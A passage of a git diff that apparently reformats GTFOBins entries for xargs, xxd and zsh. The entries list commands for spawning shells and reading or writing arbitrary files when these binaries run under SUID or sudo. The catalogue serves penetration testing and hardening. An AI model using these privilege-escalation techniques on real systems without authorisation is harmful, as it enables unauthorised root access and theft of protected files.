@@ -1,16 +1,14 @@ --- functions: execute-non-interactive: - - code: xargs -a /dev/null /usr/bin/id + - code: xargs -a /dev/null /usr/bin/id file-read: - - description: This works as long as the file does not contain the NUL character, - also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. - GNU version only. - code: | - LFILE=file_to_read - xargs -a "$LFILE" -0 + - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. + code: | + LFILE=file_to_read + xargs -a "$LFILE" -0 suid-enabled: - - code: "./xargs -a /dev/null /usr/bin/id" + - code: ./xargs -a /dev/null /usr/bin/id sudo-enabled: - - code: sudo xargs -a /dev/null /usr/bin/id + - code: sudo xargs -a /dev/null /usr/bin/id --- diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index 7d854bb..1ed5eff 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md @@ -1,19 +1,19 @@ --- functions: file-write: - - code: | - LFILE=file_to_write - echo data | xxd | xxd -r - "$LFILE" + - code: | + LFILE=file_to_write + echo data | xxd | xxd -r - "$LFILE" file-read: - - code: | - LFILE=file_to_read - xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + xxd "$LFILE" | xxd -r suid-enabled: - - code: | - LFILE=file_to_read - ./xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + ./xxd "$LFILE" | xxd -r sudo-enabled: - - code: | - LFILE=file_to_read - sudo xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + sudo xxd "$LFILE" | xxd -r --- diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index 4e73feb..59dbcb0 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: zsh + - code: zsh suid-enabled: - - code: "./zsh" + - code: ./zsh sudo-enabled: - - code: sudo zsh + - code: sudo zsh ---